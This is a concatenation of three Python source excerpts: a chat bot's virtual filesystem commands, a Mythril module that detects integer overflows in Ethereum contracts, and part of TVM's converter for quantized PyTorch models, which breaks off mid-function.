new_fs[dir_path] = new_dir
new_fs[path] = directory([])
msg = 'directory created'
return new_fs, msg
def fs_ls(fs, user, fn):
if fn == '.' or fn == '':
path = fs['user_paths'][user]
else:
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path not in fs:
msg = 'ERROR: file does not exist'
return fs, msg
if not is_directory(fs, path):
return fs, 'ERROR: {} is not a directory'.format(path)
fns = fs[path]['fns']
if not fns:
return fs, 'WARNING: directory is empty'
msg = '\n'.join('* ' + nice_path(fs, path) for path in sorted(fns))
return fs, msg
def fs_pwd(fs, user):
path = fs['user_paths'][user]
msg = nice_path(fs, path)
return fs, msg
def fs_rm(fs, user, fn):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path not in fs:
msg = 'ERROR: file does not exist'
return fs, msg
if fs[path]['kind'] == 'dir':
msg = 'ERROR: {} is a directory, file required'.format(nice_path(fs, path))
return fs, msg
new_fs = fs.copy()
new_fs.pop(path)
parent_dir = get_directory(path)
new_fs[parent_dir]['fns'].remove(path)
msg = 'removed'
return new_fs, msg
def fs_rmdir(fs, user, fn):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path not in fs:
msg = 'ERROR: directory does not exist'
return fs, msg
if fs[path]['kind'] == 'text':
msg = 'ERROR: {} is a file, directory required'.format(nice_path(fs, path))
return fs, msg
new_fs = fs.copy()
new_fs.pop(path)
parent_dir = get_directory(path)
new_fs[parent_dir]['fns'].remove(path)
for sub_path in list(new_fs.keys()):
if sub_path.startswith(path+'/'):
new_fs.pop(sub_path)
msg = 'removed'
return new_fs, msg
def fs_write(fs, user, fn, content):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path in fs:
msg = 'ERROR: file already exists'
return fs, msg
dir_path = os.path.dirname(path)
if not is_directory(fs, dir_path):
msg = 'ERROR: {} is not a directory'.format(dir_path)
return fs, msg
new_fs = fs.copy()
new_dir = directory({path}.union(fs[dir_path]['fns']))
new_fs[dir_path] = new_dir
new_fs[path] = text_file(content)
msg = 'file written'
return new_fs, msg
def fs_read(fs, user, fn):
path, msg = make_path(fs, user, fn)
if msg:
return fs, msg
if path not in fs:
msg = 'ERROR: file does not exist'
return fs, msg
if fs[path]['kind'] == 'dir':
msg = 'ERROR: {} is a directory, file required'.format(nice_path(fs, path))
return fs, msg
val = fs[path]['content']
return fs, val
def fs_cd(fs, user, fn):
if len(fn) > 1 and fn[-1] == '/':
fn = fn[:-1]
path = fn if len(fn) > 0 and fn[0] == '/' else make_path(fs, user, fn)[0]
if path not in fs:
msg = 'ERROR: invalid path'
return fs, msg
if fs[path]['kind'] == 'text':
msg = 'ERROR: {} is a file, directory required'.format(nice_path(fs, path))
return fs, msg
fs['user_paths'][user] = path
return fs, "Current path: {}".format(nice_path(fs, path))
def make_path(fs, user, leaf):
if leaf == '/':
return ['/', '']
if leaf.endswith('/'):
return ['', 'ERROR: {} is not a valid name'.format(leaf)]
if leaf.startswith('/'):
return [leaf, '']
path = fs['user_paths'][user]
if not path.endswith('/'):
path += '/'
path += leaf
return path, ''
def nice_path(fs, path):
path_nice = path
slash = path.rfind('/')
if path not in fs:
return 'ERROR: the current directory does not exist'
if fs[path]['kind'] == 'text':
path_nice = '{}*{}*'.format(path[:slash+1], path[slash+1:])
elif path != '/':
path_nice = '{}/'.format(path)
return path_nice
def get_directory(path):
slash = path.rfind('/')
if slash == 0:
return '/'
else:
return path[:slash]
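# Worked examples for the path helpers (sketch):
#
#   >>> make_path({'user_paths': {'alice': '/home/'}}, 'alice', 'file1')
#   ('/home/file1', '')
#   >>> get_directory('/home/file1')
#   '/home'
#   >>> get_directory('/foo')
#   '/'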
def directory(fns):
return dict(kind='dir', fns=set(fns))
def text_file(content):
return dict(kind='text', content=content)
def is_directory(fs, fn):
if fn not in fs:
return False
return fs[fn]['kind'] == 'dir'
handler_class = VirtualFsHandler
if __name__ == '__main__':
# We eventually want to test bots with a "real" testing
# framework.
test()
|
|
"""This module contains the detection code for integer overflows and
underflows."""
from math import log2, ceil
from typing import cast, List, Dict, Set
from mythril.analysis import solver
from mythril.analysis.report import Issue
from mythril.analysis.swc_data import INTEGER_OVERFLOW_AND_UNDERFLOW
from mythril.exceptions import UnsatError
from mythril.laser.ethereum.state.global_state import GlobalState
from mythril.laser.ethereum.util import get_concrete_int
from mythril.laser.ethereum.state.annotation import StateAnnotation
from mythril.analysis.modules.base import DetectionModule
from copy import copy
from mythril.laser.smt import (
BVAddNoOverflow,
BVSubNoUnderflow,
BVMulNoOverflow,
BitVec,
symbol_factory,
Not,
Expression,
Bool,
And,
)
import logging
log = logging.getLogger(__name__)
class OverUnderflowAnnotation:
""" Symbol Annotation used if a BitVector can overflow"""
def __init__(
self, overflowing_state: GlobalState, operator: str, constraint: Bool
) -> None:
self.overflowing_state = overflowing_state
self.operator = operator
self.constraint = constraint
def __deepcopy__(self, memodict={}):
new_annotation = copy(self)
return new_annotation
class OverUnderflowStateAnnotation(StateAnnotation):
""" State Annotation used if an overflow is both possible and used in the annotated path"""
def __init__(self) -> None:
self.overflowing_state_annotations = set() # type: Set[OverUnderflowAnnotation]
def __copy__(self):
new_annotation = OverUnderflowStateAnnotation()
new_annotation.overflowing_state_annotations = copy(
self.overflowing_state_annotations
)
return new_annotation
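# Detection flow (sketch): the arithmetic handlers below annotate the result
# BitVec with the *negated* no-overflow predicate, e.g. for ADD the
# constraint is Not(BVAddNoOverflow(op0, op1, False)), i.e. "op0 + op1 wraps
# past 2^256 - 1". The sink handlers (SSTORE, JUMPI, CALL, RETURN) copy such
# annotations into the state annotation, and at STOP/RETURN the solver
# checks whether the path constraints plus the overflow constraint are
# satisfiable; only then is an issue reported.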
class IntegerOverflowUnderflowModule(DetectionModule):
"""This module searches for integer over- and underflows."""
def __init__(self) -> None:
""""""
super().__init__(
name="Integer Overflow and Underflow",
swc_id=INTEGER_OVERFLOW_AND_UNDERFLOW,
description=(
"For every SUB instruction, check if there's a possible state "
"where op1 > op0. For every ADD, MUL instruction, check if "
"there's a possible state where op1 + op0 > 2^32 - 1"
),
entrypoint="callback",
pre_hooks=[
"ADD",
"MUL",
"EXP",
"SUB",
"SSTORE",
"JUMPI",
"STOP",
"RETURN",
"CALL",
],
)
"""
Cache satisfiability of overflow constraints
"""
self._ostates_satisfiable = set() # type: Set[GlobalState]
self._ostates_unsatisfiable = set() # type: Set[GlobalState]
def reset_module(self):
"""
Resets the module
:return:
"""
super().reset_module()
self._ostates_satisfiable = set()
self._ostates_unsatisfiable = set()
def _execute(self, state: GlobalState) -> None:
"""Executes analysis module for integer underflow and integer overflow.
:param state: Statespace to analyse
:return: Found issues
"""
address = _get_address_from_state(state)
if address in self.cache:
return
opcode = state.get_current_instruction()["opcode"]
funcs = {
"ADD": [self._handle_add],
"SUB": [self._handle_sub],
"MUL": [self._handle_mul],
"SSTORE": [self._handle_sstore],
"JUMPI": [self._handle_jumpi],
"CALL": [self._handle_call],
"RETURN": [self._handle_return, self._handle_transaction_end],
"STOP": [self._handle_transaction_end],
"EXP": [self._handle_exp],
}
for func in funcs[opcode]:
func(state)
def _get_args(self, state):
stack = state.mstate.stack
op0, op1 = (
self._make_bitvec_if_not(stack, -1),
self._make_bitvec_if_not(stack, -2),
)
return op0, op1
def _handle_add(self, state):
op0, op1 = self._get_args(state)
c = Not(BVAddNoOverflow(op0, op1, False))
annotation = OverUnderflowAnnotation(state, "addition", c)
op0.annotate(annotation)
def _handle_mul(self, state):
op0, op1 = self._get_args(state)
c = Not(BVMulNoOverflow(op0, op1, False))
annotation = OverUnderflowAnnotation(state, "multiplication", c)
op0.annotate(annotation)
def _handle_sub(self, state):
op0, op1 = self._get_args(state)
c = Not(BVSubNoUnderflow(op0, op1, False))
annotation = OverUnderflowAnnotation(state, "subtraction", c)
op0.annotate(annotation)
def _handle_exp(self, state):
op0, op1 = self._get_args(state)
if op0.symbolic and op1.symbolic:
constraint = And(
op1 > symbol_factory.BitVecVal(256, 256),
op0 > symbol_factory.BitVecVal(1, 256),
)
elif op1.symbolic:
if op0.value < 2:
return
constraint = op1 >= symbol_factory.BitVecVal(
ceil(256 / log2(op0.value)), 256
)
elif op0.symbolic:
if op1.value == 0:
return
constraint = op0 >= symbol_factory.BitVecVal(
2 ** ceil(256 / op1.value), 256
)
else:
constraint = op0.value ** op1.value >= 2 ** 256
annotation = OverUnderflowAnnotation(state, "exponentiation", constraint)
op0.annotate(annotation)
@staticmethod
def _make_bitvec_if_not(stack, index):
value = stack[index]
if isinstance(value, BitVec):
return value
stack[index] = symbol_factory.BitVecVal(value, 256)
return stack[index]
@staticmethod
def _get_description_head(annotation, _type):
return "The binary {} can {}.".format(annotation.operator, _type.lower())
@staticmethod
def _get_description_tail(annotation, _type):
return (
"The operands of the {} operation are not sufficiently constrained. "
"The {} could therefore result in an integer {}. Prevent the {} by checking inputs "
"or ensure sure that the {} is caught by an assertion.".format(
annotation.operator,
annotation.operator,
_type.lower(),
_type.lower(),
_type.lower(),
)
)
@staticmethod
def _get_title(_type):
return "Integer {}".format(_type)
@staticmethod
def _handle_sstore(state: GlobalState) -> None:
stack = state.mstate.stack
value = stack[-2]
if not isinstance(value, Expression):
return
state_annotation = _get_overflowunderflow_state_annotation(state)
for annotation in value.annotations:
if isinstance(annotation, OverUnderflowAnnotation):
state_annotation.overflowing_state_annotations.add(annotation)
@staticmethod
def _handle_jumpi(state):
stack = state.mstate.stack
value = stack[-2]
state_annotation = _get_overflowunderflow_state_annotation(state)
for annotation in value.annotations:
if isinstance(annotation, OverUnderflowAnnotation):
state_annotation.overflowing_state_annotations.add(annotation)
@staticmethod
def _handle_call(state):
stack = state.mstate.stack
value = stack[-3]
state_annotation = _get_overflowunderflow_state_annotation(state)
for annotation in value.annotations:
if isinstance(annotation, OverUnderflowAnnotation):
state_annotation.overflowing_state_annotations.add(annotation)
@staticmethod
def _handle_return(state: GlobalState) -> None:
"""
Adds all the annotations into the state which correspond to the
locations in the memory returned by RETURN opcode.
:param state: The Global State
"""
stack = state.mstate.stack
offset, length = stack[-1], stack[-2]
state_annotation = _get_overflowunderflow_state_annotation(state)
for element in state.mstate.memory[offset : offset + length]:
if not isinstance(element, Expression):
continue
for annotation in element.annotations:
if isinstance(annotation, OverUnderflowAnnotation):
state_annotation.overflowing_state_annotations.add(annotation)
def _handle_transaction_end(self, state: GlobalState) -> None:
state_annotation = _get_overflowunderflow_state_annotation(state)
for annotation in state_annotation.overflowing_state_annotations:
ostate = annotation.overflowing_state
if ostate in self._ostates_unsatisfiable:
continue
if ostate not in self._ostates_satisfiable:
try:
constraints = ostate.mstate.constraints + [annotation.constraint]
solver.get_model(constraints)
self._ostates_satisfiable.add(ostate)
except UnsatError:
self._ostates_unsatisfiable.add(ostate)
continue
log.debug(
"Checking overflow in {} at transaction end address {}, ostate address {}".format(
state.get_current_instruction()["opcode"],
state.get_current_instruction()["address"],
ostate.get_current_instruction()["address"],
)
)
try:
constraints = state.mstate.constraints + [annotation.constraint]
transaction_sequence = solver.get_transaction_sequence(
state, constraints
)
except UnsatError:
continue
_type = "Underflow" if annotation.operator == "subtraction" else "Overflow"
issue = Issue(
contract=ostate.environment.active_account.contract_name,
function_name=ostate.environment.active_function_name,
address=ostate.get_current_instruction()["address"],
swc_id=INTEGER_OVERFLOW_AND_UNDERFLOW,
bytecode=ostate.environment.code.bytecode,
title=self._get_title(_type),
severity="High",
description_head=self._get_description_head(annotation, _type),
description_tail=self._get_description_tail(annotation, _type),
gas_used=(state.mstate.min_gas_used, state.mstate.max_gas_used),
transaction_sequence=transaction_sequence,
)
address = _get_address_from_state(ostate)
self.cache.add(address)
self.issues.append(issue)
detector = IntegerOverflowUnderflowModule()
def _get_address_from_state(state):
return state.get_current_instruction()["address"]
def _get_overflowunderflow_state_annotation(
state: GlobalState
) -> OverUnderflowStateAnnotation:
state_annotations = cast(
List[OverUnderflowStateAnnotation],
list(state.get_annotations(OverUnderflowStateAnnotation)),
)
if len(state_annotations) == 0:
state_annotation = OverUnderflowStateAnnotation()
state.annotate(state_annotation)
return state_annotation
else:
return state_annotations[0]
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, import-outside-toplevel
""" Functions to convert quantized torch models to QNN """
import numpy as np
import tvm
from tvm import relay
from tvm.relay import expr as _expr
from tvm.relay import op as _op
from tvm.relay.frontend.common import infer_shape
from .common import logger
from .pytorch_utils import is_version_greater_than
class QNNParam:
"""A placeholder for weight quantization parameters"""
def __init__(self, weight, bias, scale, zero_point):
self.weight = weight
if bias is not None:
self.bias = bias.detach().numpy()
else:
self.bias = None
self.scale = _expr.const(scale)
self.zero_point = _expr.const(zero_point, dtype="int32")
class ConvPackedParam(QNNParam):
"""A placeholder for quantized conv2d op attributes
As of PyTorch 1.6, attributes of quantized conv2d ops, like
stride, padding etc are stored in ConvPackedParams objects,
together with weights and quantization parameters
"""
def __init__(
self,
weight_np,
bias,
scale,
zero_point,
stride,
padding,
dilation,
groups,
output_padding,
):
super().__init__(weight_np, bias, scale, zero_point)
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
# Used only for conv_transpose2d
self.output_padding = output_padding
def _get_quant_params(qweight):
import torch
weight_np = qweight.dequantize().numpy()
if qweight.qscheme() == torch.per_tensor_affine:
return weight_np, qweight.q_scale(), int(qweight.q_zero_point())
scales = qweight.q_per_channel_scales().numpy()
zero_points = qweight.q_per_channel_zero_points().numpy()
# This is an assumption posed by QNN
msg = "The values of zero points should be all zero for per channel"
assert np.all(zero_points == 0), msg
return weight_np, scales, 0
def make_qnn_param(qweight, bias):
weight_np, scale, zero_point = _get_quant_params(qweight)
return QNNParam(weight_np, bias, scale, zero_point)
def make_conv_packed_param(qweight, bias, packed_params):
weight_np, scale, zero_point = _get_quant_params(qweight)
stride = packed_params.stride()
padding = packed_params.padding()
dilation = packed_params.dilation()
groups = packed_params.groups()
output_padding = packed_params.output_padding()
return ConvPackedParam(
weight_np,
bias,
scale,
zero_point,
stride,
padding,
dilation,
groups,
output_padding,
)
def get_weight_quant_params(script_module, packed_param_names):
"""Retrive and unpack weight parameters from quantized modules"""
import torch
param_name = "_packed_params"
quant_params = {}
def filter_func(named_module):
m = named_module[1]
return isinstance(m, torch.jit.RecursiveScriptModule) and (
("Conv" in m.original_name) or (m.original_name == "LinearPackedParams")
)
for name, m in filter(filter_func, script_module.named_modules()):
key = name + "." + param_name
state_dict = m.state_dict()
if key not in packed_param_names:
continue
if len(state_dict) == 0 and not hasattr(m, param_name):
# for v1.6 and above
# This case seems to happen if a model is serialized
# and loaded back
# This module can be safely ignored
continue
if len(state_dict) == 0 and hasattr(m, param_name):
# for v1.6 and above
packed_params = m._packed_params
else:
assert len(state_dict) == 1
packed_params = list(state_dict.values())[0]
if "Conv" in m.original_name and len(state_dict) == 0:
qweight, bias = torch.ops.quantized.conv2d_unpack(packed_params)
quant_params[key] = make_conv_packed_param(qweight, bias, packed_params)
elif "Conv" in m.original_name:
qweight, bias = torch.ops.quantized.conv2d_unpack(packed_params)
quant_params[key] = make_qnn_param(qweight, bias)
elif m.original_name == "LinearPackedParams":
qweight, bias = torch.ops.quantized.linear_unpack(packed_params)
quant_params[key] = make_qnn_param(qweight, bias)
return quant_params
def quantize_numpy(weight, scale, zero_point, out_dtype_np):
iinfo = np.iinfo(out_dtype_np)
clip_min = iinfo.min
clip_max = iinfo.max
if len(scale.shape) > 0:
scale = np.reshape(scale, [weight.shape[0]] + [1] * (len(weight.shape) - 1))
transformed = zero_point + weight / scale
return np.clip(np.round(transformed), clip_min, clip_max).astype(out_dtype_np)
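# A worked instance of the affine quantization above (values illustrative):
#
#   >>> quantize_numpy(np.array([1.0, -7.0]), np.float32(0.05),
#   ...                np.int64(0), np.int8)
#   array([  20, -128], dtype=int8)
#
# 1.0 / 0.05 rounds to 20, while -7.0 / 0.05 = -140 is clipped to the int8
# minimum of -128.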
def add_quant_params_to_outputs(
outputs, packed_param_map, quant_params, input_scales_for_bias, keep_quantized_weight=False
):
"""
Add quant params to outputs so that they can be referenced by other
ops later. Weights are quantized here.
"""
for node_name, packed_param_name in packed_param_map.items():
qparam = quant_params[packed_param_name]
weight_scale = _get_numpy(qparam.scale)
param_prefix = packed_param_name[: -len("._packed_params")]
if keep_quantized_weight:
qparam.weight_var = _expr.var(
param_prefix + "_weight", shape=qparam.weight.shape, dtype="int8"
)
qparam.weight = quantize_numpy(
qparam.weight, weight_scale, _get_numpy(qparam.zero_point), np.int8
)
qweight = qparam.weight_var
else:
qparam.weight_var = _expr.var(
param_prefix + "_weight", shape=qparam.weight.shape, dtype="float32"
)
qweight = relay.qnn.op.quantize(
qparam.weight_var, qparam.scale, qparam.zero_point, out_dtype="int8", axis=0
)
if qparam.bias is not None:
float_bias_var = _expr.var(
param_prefix + "_bias", shape=qparam.bias.shape, dtype="float32"
)
if node_name not in input_scales_for_bias:
# This case is for dynamic quantization, where the input activation scale is
# unknown until runtime.
qparam.bias_var = float_bias_var
qbias = qparam.bias_var
elif keep_quantized_weight:
qparam.bias_var = _expr.var(
param_prefix + "_bias", shape=qparam.bias.shape, dtype="int32"
)
qparam.bias = quantize_numpy(
qparam.bias, input_scales_for_bias[node_name] * weight_scale, 0, np.int32
)
qbias = qparam.bias_var
else:
qparam.bias_var = float_bias_var
qbias = relay.qnn.op.quantize(
qparam.bias_var,
_expr.const(input_scales_for_bias[node_name] * weight_scale),
_expr.const(0, "int32"),
out_dtype="int32",
axis=0,
)
else:
qbias = None
quant_params[packed_param_name] = qparam
params = [qweight, qparam.scale, qparam.zero_point, qbias]
if isinstance(quant_params[packed_param_name], ConvPackedParam):
params += [
qparam.stride,
qparam.padding,
qparam.dilation,
qparam.groups,
qparam.output_padding,
]
outputs[node_name] = params
def _get_quant_param_for_input(input_value):
"""
We want to know the input scale and zp of this input_value, since
input quant params are not explicitly passed around in torch (they
are embedded in a QTensor data structure, not visible statically).
We know that it is quantized using output scale and zp
of some previous quantized op. The purpose of this function
is to find that pair of parameters.
"""
# Indices for output scale and zp
# For example, in quantized::conv2d(%input, %1, %2, %3, %4, %5, %6, %7),
# 6th and 7th arg are output scale and zp respectively.
# PyTorch 1.6 changed qconv API
if is_version_greater_than("1.5.1"):
qconv_indices = (2, 3)
else:
qconv_indices = (6, 7)
output_quant_param_indices = {
"aten::quantize_per_tensor": (1, 2),
"quantized::conv2d": qconv_indices,
"quantized::conv2d_relu": qconv_indices,
"quantized::linear": (2, 3),
"quantized::linear_relu": (2, 3),
"quantized::add_relu": (2, 3),
"quantized::add": (2, 3),
"quantized::mul_relu": (2, 3),
"quantized::mul": (2, 3),
"quantized::cat": (2, 3),
"quantized::mul_scalar": (2, 3),
"quantized::add_scalar": (2, 3),
"quantized::hardswish": (1, 2),
"quantized::conv_transpose2d": qconv_indices,
}
def dfs(current_node):
# trace back to find the producer of this input value
current_op = current_node.kind()
if current_op in output_quant_param_indices:
indices = output_quant_param_indices[current_op]
scale = current_node.inputsAt(indices[0])
zp = current_node.inputsAt(indices[1])
return scale, zp
# Trace back earlier nodes, dfs order
# Assume quantized tensor comes earlier in the args
for arg in current_node.inputs():
return dfs(arg.node())
# shouldn't happen
assert False, "No producer for %s" % (str(current_node))
return dfs(input_value.node())
def _get_add_scalar_output_quant_param(input_scale, input_zero_point, scalar):
"""
Determine the output scale and zp of quantized::add_scalar op
This is used for mobilenet v3
Refer to aten/src/ATen/native/quantized/cpu/qadd.cpp
The names of variables are the same as torch impl
"""
q_min = 0
q_max = 255
s = input_scale
z = input_zero_point
c = scalar
c_q = round(c / s)
if q_min > z - c_q:
s_prime = (float(q_max) - (z - c_q)) / (float(q_max) - q_min) * s
z_prime = q_min
elif q_max < z - c_q:
s_prime = (float(z - c_q) - q_min) / (float(q_max) - q_min) * s
z_prime = q_max
else:
s_prime = s
z_prime = z - c_q
return s_prime, z_prime
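# Worked example (values illustrative): with input_scale s = 0.1,
# input_zero_point z = 10 and scalar c = 3.0, c_q = round(30.0) = 30 and
# z - c_q = -20 < q_min, so the output params become
# s' = (255 - (-20)) / 255 * 0.1 ~= 0.1078 and z' = 0.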
def _get_mul_scalar_output_quant_param(input_scale, input_zero_point, scalar):
"""
Determine the output scale and zp of quantized::mul_scalar op
This is used for mobilenet v3
Refer to aten/src/ATen/native/quantized/cpu/qmul.cpp
The names of variables are the same as torch impl
"""
q_min = 0
q_max = 255
self_scale = input_scale
self_zero_point = input_zero_point
other_val = scalar
if other_val > 0.0:
s_prime = other_val * self_scale
z_prime = self_zero_point
elif other_val == 0.0:
s_prime = 1.0
z_prime = 0
else:
s_prime = abs(other_val) * self_scale
z_prime = q_max - (self_zero_point - q_min)
return s_prime, z_prime
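# Worked example (values illustrative): multiplying by scalar -2.0 with
# input scale 0.1 and zero point 10 gives s' = |-2.0| * 0.1 = 0.2 and
# z' = q_max - (z - q_min) = 255 - 10 = 245; a positive scalar keeps the
# zero point and simply scales s.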
def _add_output_quant_params_to_scalar_op(node, graph, input_scale, input_zero_point, scalar):
"""
The output scale and zp of {add,mul}_scalar op are not explicit in the IR
They are required for _get_quant_param_for_input above to work correctly
So calculate these params using the same way torch does, and make new
constant nodes in the input IR. Also add these params to the inputs of
scalar op.
For example,
%6 : float = prim::Constant[value=3.]()
%input : QUInt8(1, 3, 224, 224) = quantized::add_scalar(%x.1, %6)
becomes
%6 : float = prim::Constant[value=3.]()
%7 : float = prim::Constant[value=0.015686161816120148]()
%8 : int = prim::Constant[value=0]()
%input : UInt8(1, 3, 224, 224) = quantized::add_scalar(%x.1, %6, %7, %8)
%7 and %8 are newly created output scale and zp constant nodes
"""
# pylint: disable=c-extension-no-member
import torch
operator = node.kind()
if operator == "quantized::mul_scalar":
out_scale, out_zero_point = _get_mul_scalar_output_quant_param(
input_scale, input_zero_point, scalar
)
elif operator == "quantized::add_scalar":
out_scale, out_zero_point = _get_add_scalar_output_quant_param(
input_scale, input_zero_point, scalar
)
else:
raise NotImplementedError("unsupported scalar op: %s" % operator)
# create new constant nodes and add them to graph
out_scale_node = graph.create("prim::Constant")
out_zero_point_node = graph.create("prim::Constant")
out_scale_node.insertBefore(node)
out_zero_point_node.insertBefore(node)
out_scale_node.f_("value", out_scale)
out_zero_point_node.i_("value", out_zero_point)
out_scale_node.output().setType(torch._C.FloatType.get())
out_zero_point_node.output().setType(torch._C.IntType.get())
node.addInput(out_scale_node.output())
node.addInput(out_zero_point_node.output())
def add_input_quant_params_to_op_inputs(graph):
"""
In Torch, input quant params are not explicitly passed around
Instead, they are stored in QTensor data structure, and retrieved
at runtime by each quantized ops.
However, they need to be known statically for QNN translation.
To workaround and simplify the translation of inputs, we manually add
input quant params to inputs of Torch quantized operators listed below.
See _quantized_conv2d() below for example of why this is helpful.
For example,
%input : QUInt8(1, 512, 7, 7) = quantized::add(%x.8, %x.9, %434, %435)
becomes
%395 : float = prim::Constant[value=0.036212071776390076]()
%396 : int = prim::Constant[value=0]()
%430 : float = prim::Constant[value=0.16080744564533234]()
%431 : int = prim::Constant[value=42]()
%input : QUInt8(1, 512, 7, 7) = quantized::add(%x.8, %x.9, %434, %435,
%430, %431, %395, %396)
%434, %435 are output scale and zp of quantized::add op
%430, %431, %395, %396 are two pairs of input (scale, zp) for two tensors
added by this function
"""
# How many quantized tensors does each op take as input?
# A pair of (scale, zp) for each input quantized tensor will be added
# to the input nodes
num_quantized_inputs = {
"quantized::conv2d": 1,
"quantized::conv2d_relu": 1,
"quantized::linear": 1,
"quantized::linear_relu": 1,
"quantized::add_relu": 2,
"quantized::add": 2,
"quantized::mul_relu": 2,
"quantized::mul": 2,
"aten::dequantize": 1,
"aten::mean": 1,
"aten::upsample_nearest2d": 1,
"aten::upsample_bilinear2d": 1,
"aten::relu_": 1,
"aten::relu": 1,
"quantized::add_scalar": 1,
"quantized::mul_scalar": 1,
"quantized::relu6": 1,
"quantized::hardswish": 1,
"aten::hardsigmoid": 1,
"quantized::conv_transpose2d": 1,
}
need_input_quant_param = set(num_quantized_inputs.keys())
need_input_quant_param.add("quantized::cat")
input_scales_for_bias = {}
for node in graph.nodes():
operator = node.kind()
if operator not in need_input_quant_param:
continue
input_scales = []
input_zero_points = []
if operator == "quantized::cat":
# the number of inputs to concat is not constant
# so handle it separately
inputs = node.inputsAt(0).node().inputs()
for inp in inputs:
scale, zp = _get_quant_param_for_input(inp)
input_scales.append(scale)
input_zero_points.append(zp)
else:
for i in range(num_quantized_inputs[operator]):
scale, zp = _get_quant_param_for_input(node.inputsAt(i))
input_scales.append(scale)
input_zero_points.append(zp)
if operator in ["quantized::add_scalar", "quantized::mul_scalar"]:
scalar = node.inputsAt(1).node().f("value")
inp_scale = input_scales[0].node().f("value")
inp_zero_point = input_zero_points[0].node().i("value")
# see the comments in this function above
_add_output_quant_params_to_scalar_op(node, graph, inp_scale, inp_zero_point, scalar)
for scale, zp in zip(input_scales, input_zero_points):
node.addInput(scale)
node.addInput(zp)
if "conv" in operator or "linear" in operator:
# This is required for quantizing the bias
input_scales_for_bias[node.inputsAt(1).debugName()] = scale.node().f("value")
return input_scales_for_bias
def add_quant_params(params, quant_params):
"""Add quant parameters to TVM param map"""
for qparam in quant_params.values():
params[qparam.weight_var.name_hint] = tvm.nd.array(qparam.weight)
if qparam.bias is not None:
params[qparam.bias_var.name_hint] = tvm.nd.array(qparam.bias)
def apply_with_upcast(data, func):
inp = _op.cast(data, dtype="int32")
out = func(inp)
return _op.cast(out, "uint8")
def quantized_mean(data, input_scale, input_zero_point, func_fp32):
# refer to aten/src/ATen/native/quantized/cpu/qreduction.cpp
dequantized = relay.qnn.op.dequantize(data, input_scale, input_zero_point)
out = func_fp32(dequantized)
return relay.qnn.op.quantize(out, input_scale, input_zero_point, out_dtype="uint8", axis=1)
def quantized_upsample(data, input_scale, input_zero_point, func_fp32):
# currently piggybacks to fp32; it gets output identical to torch
data = relay.qnn.op.dequantize(data, input_scale, input_zero_point)
out = func_fp32(data)
return relay.qnn.op.quantize(out, input_scale, input_zero_point, out_dtype="uint8", axis=1)
def quantized_relu(data, input_zero_point):
# refer to aten/src/ATen/native/quantized/cpu/qrelu.cpp
zp = _op.cast(input_zero_point, dtype="uint8")
return _op.tensor.maximum(data, zp)
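# Quick numeric illustration of the line above (hypothetical values, not part
# of the original module): quantized ReLU is just max(q, zero_point).
#   scale, zp = 0.1, 3          # real = (q - 3) * 0.1
#   q = 1                       # represents -0.2
#   max(q, zp) -> 3             # represents 0.0, i.e. relu(-0.2)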
def _quantize_per_tensor():
def _impl(inputs, _):
return relay.qnn.op.quantize(
inputs[0], _expr.const(inputs[1]), _expr.const(inputs[2]), out_dtype="uint8", axis=1
)
return _impl
def _dequantize():
def _impl(inputs, _):
assert len(inputs) == 3, "Input quant params not found in op inputs"
inp_scale = _expr.const(inputs[1])
inp_zero_point = _expr.const(inputs[2])
return relay.qnn.op.dequantize(inputs[0], inp_scale, inp_zero_point)
return _impl
def _get_numpy(relay_const_scalar):
return relay_const_scalar.data.numpy()
def _get_scalar(relay_const_scalar):
return _get_numpy(relay_const_scalar).item(0)
def _do_bias_and_requantize(
output, bias, input_scale, weight_scale, output_scale, output_zero_point, with_relu
):
"""Output processing for conv and linear"""
# this is a vector for per channel case
requant_input_scale = _expr.const(_get_numpy(input_scale) * _get_numpy(weight_scale))
# Torch does bias add and requantize scale in fp32
# refer to third_party/fbgemm/include/fbgemm/OutputProcessing-inl.h
# Instead, we do bias add in int32 and use qnn requantize, which needs
# integer input.
# We observed no loss in accuracy doing it this way, and it is better
# for tvm because bias quantization can be done at compile time.
# The torch way, in contrast, requires rounding of the activation at runtime.
if bias is not None:
requantize_input = _op.nn.bias_add(output, bias)
else:
requantize_input = output
requantized = relay.qnn.op.requantize(
requantize_input,
requant_input_scale,
relay.const(0, "int32"),
output_scale,
output_zero_point,
out_dtype="int32",
axis=1,
)
clip_min = 0
if with_relu:
clip_min = _get_scalar(output_zero_point)
clip = _op.tensor.clip(requantized, clip_min, 255.0)
return _op.cast(clip, dtype="uint8")
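# Worked example of the requantize math above (hypothetical values, for
# illustration only): with input_scale = 0.02 and weight_scale = 0.05, the
# int32 accumulator sits on a scale of 0.02 * 0.05 = 0.001; requantize then
# rescales by 0.001 / output_scale and shifts by output_zero_point, before
# the final clip to [0, 255] and cast to uint8.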
def _quantized_conv2d(with_relu=False):
def _impl(inputs, _):
# refer to src/ATen/native/quantized/cpu/qconv.cpp
# inputs[0]: input tensor
# inputs[1]: (weight, scale, zero_point, bias)
# inputs[2-5]: stride, padding, dilation, groups
# inputs[6]: output_scale
# inputs[7]: output_zero_point
# inputs[8]: input_scale (added manually by frontend)
# inputs[9]: input_zero_point (added manually by frontend)
conv_params = inputs[1]
weight = conv_params[0]
weight_scale = conv_params[1]
weight_zero_point = conv_params[2]
bias = conv_params[3]
if len(conv_params) > 4:
# Torch 1.6 or newer case
strides = conv_params[4]
padding = conv_params[5]
dilation = conv_params[6]
groups = conv_params[7]
output_scale = _expr.const(inputs[2])
output_zero_point = _expr.const(inputs[3])
assert len(inputs) == 6, "Input quant params not found in op inputs"
# These are manually added by add_input_quant_params_to_op_inputs above
# In torch, they are retrieved from QTensor data structure at runtime
input_scale = _expr.const(inputs[4])
input_zero_point = _expr.const(inputs[5])
else:
strides = inputs[2]
padding = inputs[3]
